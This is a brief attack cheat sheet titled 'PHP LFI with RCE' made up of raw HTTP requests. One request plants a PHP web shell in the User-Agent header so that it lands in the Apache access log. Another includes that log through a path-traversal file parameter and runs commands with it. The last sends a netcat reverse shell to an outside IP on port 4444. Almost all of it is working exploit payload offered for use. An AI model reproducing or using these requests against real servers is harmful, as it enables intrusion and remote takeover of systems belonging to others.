PHP LFI with RCE

GET / HTTP/1.1
Host: 11.22.33.44
User-Agent: MozillaHacked<pre><?php echo shell_exec($_REQUEST['cmd']) ?></pre>

GET http://$IP/index.php?file=../../../../../../../../var/log/apache2/access.log&cmd=id

POST /index.php?file=../../../../../../../../var/log/apache2/access.log HTTP/1.1
Host: 192.168.240.72:8593
Content-Type: application/x-www-form-urlencoded

cmd=netcat 55.66.77.88 4444 -e /bin/bash